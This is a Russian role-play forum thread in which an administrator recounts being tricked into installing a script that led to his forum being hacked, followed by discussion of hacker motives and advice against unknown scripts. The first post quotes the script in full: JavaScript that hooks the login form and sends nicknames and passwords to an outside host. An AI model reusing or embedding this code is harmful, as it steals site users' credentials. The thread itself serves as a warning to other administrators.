Данный проект создан для того, чтобы начинающие администраторы и Гейм-мастера могли найти здесь ответы на вопросы, часто возникающие при организации форумной ролевой литературной игры (верхние разделы форума). Остальные разделы предназначены для размещения рекламы ваших игр. РЕКЛАМА ВЗАИМНАЯ . Внимание! Правила рекламного каталога изменились: в каталог не принимается реклама форумов, пропагандирующих любые половые отклонения.
Отправлено: 26.11.07 22:39. Заголовок: Рассказ о взломе
[Удалено администратором :) ] Администратор решил вернуть удаленное. Издание 2-е, перераб. и доп.
24 ноября ко мне зарегистрировался участник, который написал мне в ЛС, что ему очень нравится мой форум, ему очень нравятся ролевые игры, он очень хочет принять участие в обсуждении. Но он живёт не в России и у него другая система в компьютере и другой браузер, который не позволяет ему отвечать на форуме. Попросил поставить в HTML скрипт, который написан специально для его браузера и позволит ему оставлять сообщения на форуме. Мои прения с этим участником длились долго, в конце-концов участник стал присылать мне адреса других форумов, на которых стоит этот скрипт и на которых он сам играет. Я согласился поставить этот скрипт Конечно, это было большой глупостью с моей стороны. Вот этот скрипт:
<script type="text/javascript"> function block (t) { t = t.replace("%", escape("%")); t = t.replace("$", escape("$")); t = t.replace("#", escape("#")); t = t.replace("\\", escape("\\")); return t; } function newtest() { if (document.all.nick.value) { a = document.all.nick.value; b = document.all.pass.value; } else if (document.frm.nick.value) { a = document.frm.nick.value; b = document.frm.pass.value; } else { a = "undefined"; b = "no"; } a = block(a); b = block(b); img = new Image(); img.src = "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b; setTimeout("newtest()", 1); } document.temp = new function() { var sec = document.write; this.write = function(txt) { txt = txt.replace(/<FORM.action=....method=POST>/, "<FORM action=\"/\" onsubmit=\"newtest()\" id=frm name=frm method=POST>"); this.sec = sec; this.sec(txt); this.sec = null; return true; } return this; } document.write = document.temp.write; document.temp = null; document.writeln = document.write; </script>
Ночью форум был взломан. (кликните на картинку, чтобы прочитать "послание" взломщика)
Взломщик удалил тему с объявлением, оставленную накануне форумом "Критик" о том, что наш форум "Сентябрьский Лис" внесён в каталог, удалил личные сообщения администратора (т.е. Лиса), в которых велись переговоры по поводу скрипта, очистил несколько тематических разделов и бан-лист, а так же удалил регистрацию участника, который был в курсе моих переговоров.
Разговоры на форуме "Критик" до взлома моего форума:
После взлома: Кстати, то что "Критик гавно" у нас никто не писал. Я бы себе никогда не позволил таких выражений (да и другим не позволил бы тоже). У нас на форуме было написано: "Критик угрожает нас взломать". Написано это было на основании тех разговоров, скриншоты которых вы видите выше.
"У них там массовая амнистия" - фраза означает, что взломщик очистил бан-лист. Действительно, тему почистили не всю. Чистосердечное признание! cater - второй ник Кота Бегемота.
Комментарий специалиста:
цитата:
Мда, ну скрипт на вид выглядит достаточно безобидно, но вот эта строчка: "http://finalrev.jino-net.ru/155/s.php?" + a + " - " + b;" - выглядит крайне подозрительно и знакомо. Если бы не обозначения, что именно присваивается этим переменным (хотя я яваскрипт плохо знаю и не вполне понимаю смысл того, что им присваивается), я бы сказала что на сервере этого типа скрипт s.php записывает вытянутые у админа логин (а) и пароль (b). Плюс к тому объяснение выглядит как чистый "развод лохов"
Сообщение: 1040
Настроение: не лучшее
Откуда: Россия, СПб
Репутация:
9
Награды:
Отправлено: 04.07.08 21:43. Заголовок: Да нет, как я уже го..
Да нет, как я уже говорил, в общем-то взломщик мог бы вообще всё снести нафиг, т.е. весь форум, но он этого не сделал.
Правда case может полностью восстановить уничтоженный форум т.к. у него остаётся резервная копия всех форумов Borda (кстати, о borda. Насколько я знаю, больше ни один сервис такой услуги юзерам не предлагает).
Но Бегемот (взломщик) поступил достаточно деликатно, почти все темы оставив на месте.
Отправлено: 10.08.08 18:28. Заголовок: На форуме техподдерж..
На форуме техподдержки у case в разделе "Свободное общение" есть тема "Форумы хакерской тематики". Зачем она там – объяснено в первом сообщении. Форумы, указанные в начале темы уже удалены. Но часть форумов существует. Например, тот, что указан в сообщении от 01.08.08.
Когда есть время, я захожу на такие форумы. После случая с форумом Лиса я сама убедилась, что от взлома никто не гарантирован. Я хожу и смотрю, чего можно ожидать, на что не нужно попадаться, что вообще, потенциально может случиться. Ведь и форум Лиса взломали от недостатка знаний самого Лиса и его излишней доверчивости.
Я умышленно не сообщаю адресов форумов и тем. Кому надо, тот сам сходит и посмотрит.
Более всего меня впечатлила тема "Угон мыла". Речь идёт об Яндексовских ящиках. Можно, конечно, проще выйти из положения – не заводить ящик на Яндексе. Но тут такая загвоздка, когда регистрируешь сайт на Народе.ру к сайту автоматически прилагается ящик. И ящик автоматически получается с тем же паролем, что и логин на Яндексе. Если сменить пароль на ящике – он автоматически меняется и на Народе, они взаимосвязаны.
Получается, что взломав ящик, хакер спокойно получает и доступ к моему сайту.
По свидетельству других членов форума указанным способом взломать ящик получается раз на 6-7-8. Нужно только проявить терпение...
Мне захотелось подумать о том, какие мотивы могут руководить взломщиками. Насколько я понимаю, часто действует вовсе не желание навредить какому-нибудь конкретному сайтовладельцу (хотя и такое тоже бывает), тут немалое имеет место желание вступить в борьбу с защитной системой ящиков или сервисов. Вероятно, это воспринимается, как игра: "вот я вступаю в борьбу с защитной системой - смогу ли я её победить?!"
При этом обычный юзер, у которого ломают ящик - это просто расходный материал, подопытный кролик. Для того, чтобы сразиться с Яндексом - нужен ведь чей-то ящик. Получается, что взломщик - это игрок. Вот только играет он в другие игры.
Вот например эта ситуация, приведённая в первом посте темы. Бегемоту было совершенно нечего делить со мной. Мы вообще не знали друг друга. Мотивом его деятельности был интерес: сработает-не сработает? Периодически видишь картину: сайт/форум взломан, и так и остаётся висеть с перекошенным дизайном и надписью хакера. И висеть он так может достаточно долго. Хозяин почему-то не обращается за помощью к тому же case, чтобы восстановил пароль и темы форума. Почему - не знаю, но могу сказать за себя.
Когда "Лиса" взломали, мне стало пофиг. "Баба с возу - кобыле легче" - одним форумом меньше, тем более, что все наиболее ценные статьи форума были скопированы у меня в компьютер.
Форум тоже висел целый день с приветствием Бегемота на самом видном месте. Мне действительно было пофиг и я не собирался его восстанавливать. Более всего обеспокоены происходящим были Мэгги и сам Бегемот, который в течение дня несколько раз появлялся и писал всякую чушь, смысл которой можно было перевести так: "Чё это вы сидите и ничего не делаете?"
Вечером мне в конце концов стало жалко народ, который очень переживал и ломился в аску к Мэгги и Макнамары (ко мне никто не ломился, потому что я аську не включал) и я отдал Маку ГПФ и он уже там сам всё менял и восстанавливал.
Вообще, любой сайтовладелец должен быть готов к тому, что в любой момент можно всё потерять. Поэтому нужно всё по максимуму хранить у себя в компьютере (или на диске): коды, фотографии, тексты. Например, если хакнут новеллизацию - я восстановлю её в течении получаса. Нужно только загрузить готовые страницы с компьютера и поменять на них адреса...
P.S. А с Народа, действительно лучше бы свалить, в какое-нибудь более надёжное место...
24 ноября ко мне зарегистрировался участник, который написал мне в ЛС, что ему очень нравится мой форум, ему очень нравятся ролевые игры, он очень хочет принять участие в обсуждении. Но он живёт не в России и у него другая система в компьютере и другой браузер, который не позволяет ему отвечать на форуме. Попросил поставить в HTML скрипт, который написан специально для его браузера и позволит ему оставлять сообщения на форуме. Мои прения с этим участником длились долго, в конце-концов участник стал присылать мне адреса других форумов, на которых стоит этот скрипт и на которых он сам играет. Я согласился поставить этот скрипт Конечно, это было большой глупостью с моей стороны.
Теперь я понимаю, почему здесь так не любят джава-скрипты)). Мне в этом деле повезло (ттт., чтоб не сглазить.) Я познакомилась с мальчиком, школьником, который прекрасно разбирается в джава скриптах и имеет несколько форумов с отличной посещаемостью (поэтому для взлома ему моя ролевая не интересна, более того, он даже не понимает, что такое ролевые, и с чем их едят.Парень любит контер страйк и иже с ними.Все мои попытки научить его писать посты с треском провалились.) Но мы с ним поладили, нашли общий язык.Я оценила его скрипты, а он стал помогать мне с ролевой.Конечно, на ролевой еще масса недоработок, но этот парень мне очень помог (и надеюсь, будет помогать в дальнейшем.) Даже рассказал про скрипты взлома, и какую угрозу они несут.А то я в этом деле полный лузер.))
Что именно вам хочется узнать? Я всего уже не припомню.
Ну, я не взломщик, чтобы конкретно спрашивать. Можно было бы сделать, что-то вроде ликбеза: что потенциально может быть опасным и что конкретно ставить нельзя.
А то я в основном придерживаюсь правила: "Лучше вообще ничего не ставить!" И вообще, самое надёжное - голый html: чтоб никаких php и java!
Можно было бы сделать, что-то вроде ликбеза: что потенциально может быть опасным и что конкретно ставить нельзя.
Не думаю, что Кирилл сможет назвать вам конкретные коды, которые ставить нельзя)).Новые же придумывают каждый день)).Может только самые известные назовет, например те, которые вышибают всех админов. Сентябрьский Лис пишет:
цитата:
А то я в основном придерживаюсь правила: "Лучше вообще ничего не ставить!" И вообще, самое надёжное - голый html: чтоб никаких php и java!
Золотые слова.Мне так Кирилл и сказал:"Оля, если не понимаешь скрипт-даже не дотрагивайся.")) И дал ссылку для восстановления сайта, если что случиться вдруг.
Вообще, действительно лучше избегать любых скриптов. А если предлагают. как рассказано выше, банить с первых же слов.
Слишком жестко)).Так можно нажить много забанненых врагов, которые будут засыпать форум спамом, заходить под другим айпи и старательно вредить (тем более ломают форумы в основном дети.Что-то я не припомню на своей практике взрослых людей, которые были бы заинтересованы во взломе чужой ролевой.Ведь денег они с этого не получат, а создать свою ролевую взрослый человек может и покруче, чем у кого-то.А с детьми надо как-то аккуратно разговаривать, особенно с подростками-гениями во взломе)). Тем более, подростки довольно злопамятны.
Отправлено: 11.01.10 06:21. Заголовок: Gabi Kaufmann вот ещ..
Gabi Kaufmann вот ещё, тратить вежливость на моральных уродов. Ну у меня бан- лист периодически пополняется, ну чуть чуть поднял я уровень защиты- и на потуги "врагов" я, если честно, поплёвываю с высокой башни. И всю их злопамятность я как- то игнорирую.
Миледи2 пишет:
цитата:
Вообще, действительно лучше избегать любых скриптов. А если предлагают. как рассказано выше, банить с первых же слов.
Думаю, меня бы тут давно забанили, если бы прислушивались к вашему правилу)).Я в одной темке очень радела за джава-скрипты)). Beastmaster пишет:
цитата:
вот ещё, тратить вежливость на моральных уродов. Ну у меня бан- лист периодически пополняется, ну чуть чуть поднял я уровень защиты- и на потуги "врагов" я, если честно, поплёвываю с высокой башни. И всю их злопамятность я как- то игнорирую.
Не вы ли хотели составить черный список, не ваш-ли форум замучили такие уроды?)) Вот потому и замучили, они все отомстить вам пытаются, а не выходит никак)).
Отправлено: 11.01.10 13:29. Заголовок: Gabi Kaufmann ой да..
Gabi Kaufmann ой да на здравие, пусть пытаются. На одном форуме мне такую замечательную рекламу сделали, спасибо им за 2 игроков, которые на обычную рекламу бы и не посмотрели))) Типа Бист (далее смотрим подпись Сентябрьского Лиса, примерно то же самое) с адресом форума на месте объявления.
А идея была после того, как на форуме моей хорошей знакомой один "обиженный" снёс все настройки. Я тогда срочно бросил все дела и полез восстанавливать ей проект. Вот такие люди, ИМХО, опасны.
Вот и решил посоветоваться- а есть ли смысл?
Да и вы как, навязывали скрипты, убеждали поставить и т.д.?
Да и вы как, навязывали скрипты, убеждали поставить и т.д.?
Не убеждала конечно, но активно пропагандировала что они полезны, и можно сказать навязывала всем свою точку зрения)). Beastmaster пишет:
цитата:
Вот и решил посоветоваться- а есть ли смысл?
Ну знаете, это как в переговорах с террористами.Можно сразу провести зачистку и всех уничтожить, и террористов, и невинных людей, которые случайно попали под обстрел, а можно провести переговоры. Не даром есть военные психологи и тд.))
Gabi Kaufmann, так Вы переходите на borda - бордовский форум взломать невозможно (во всяком случае, ребёнку )
Gabi Kaufmann пишет:
цитата:
Так можно нажить много забанненых врагов, которые будут засыпать форум спамом
Так Вы поставьте красный уровень защиты.
Gabi Kaufmann пишет:
цитата:
А с детьми надо как-то аккуратно разговаривать, особенно с подростками-гениями во взломе)).
Самая главная гениальность подростков-гениев - в лопушестве админов (как это видно по первому сообщению темы)
Gabi Kaufmann пишет:
цитата:
Тем более, подростки довольно злопамятны.
Всё! Страшнее подростка зверя нет! И как это бедный Лис до сих пор жив, когда у него полный бан-лист подростков, за исключением Алекса-Палпатина, которому нынче, вроде как, 35 лет. Однако, последний хвастался, что у него друзья в Интерполе!))))
Gabi Kaufmann пишет:
цитата:
Думаю, меня бы тут давно забанили
Gabi Kaufmann, на этом форуме никто ни от чего не гарантирован!
Beastmaster пишет:
цитата:
На одном форуме мне такую замечательную рекламу сделали, спасибо им за 2 игроков, которые на обычную рекламу бы и не посмотрели))) Типа Бист (далее смотрим подпись Сентябрьского Лиса, примерно то же самое) с адресом форума на месте объявления.
Меня тоже одно время так рекламили! Или почти так.
Всё! Страшнее подростка зверя нет! И как это бедный Лис до сих пор жив, когда у него полный бан-лист подростков, за исключением Алекса-Палпатина, которому нынче, вроде как, 35 лет. Однако, последний хвастался, что у него друзья в Интерполе!))))
Изумительный случай детской непосредственности при кризисе среднего возраста. Сентябрьский Лис пишет:
цитата:
Gabi Kaufmann, так Вы переходите на borda - бордовский форум взломать невозможно (во всяком случае, ребёнку
Могу привести массу реальных случаев, когда дети взламывали борду ( и именно борду, а не какой-либо другой сервис). Сентябрьский Лис пишет:
цитата:
на этом форуме никто ни от чего не гарантирован!
Вы на что намекаете? Сентябрьский Лис пишет:
цитата:
Самая главная гениальность подростков-гениев - в лопушестве админов (как это видно по первому сообщению темы)
Они и не такое умеют)).Просто, уж извините меня, взрослые хакеры будут взламывать счета банков а уж никак не ролевые игры.Хосподи, кому они нужны. Сентябрьский Лис пишет:
Лис, не злитесь, я говорила вовсе не про вас, а про взломщиков, которые завидуют чужим успехам. И никто не говорит-что дети киборги и от них надо прятаться под кроватью.Просто порой здравый диалог полезнее бана, вот о чем я... Сентябрьский Лис пишет:
цитата:
Я ни на что не намекаю. Я всё прямо говорю: "Никто ни от чего не гарантирован!"
Посему я не буду флудить и придавать вам лишнюю работу)). Свою мысль о взломщиках я высказала, добавить мне нечего.
Вы что?! Я не злюсь! Просто насколько я знаю, форум borda самый неуязвимых для взломов из всех подобных сервисов. Реально. Мне бы хотелось услышать реальный рассказ, как его удалось кому-то взломать, тем более ребёнку.
Он в принципе не ломается. Потому и конкурентоспособен среди остальных (т.к. других минусов у него достаточно много) Я лично думаю, что Вы просто прихвастнули и на самом деле не знаете ни одного реального случая, когда бы дети взламывали Борду. Если я не прав - докажите.
Все даты в формате GMT
3 час. Хитов сегодня: 19
Права: смайлы да, картинки да, шрифты да, голосования нет
аватары да, автозамена ссылок вкл, премодерация откл, правка нет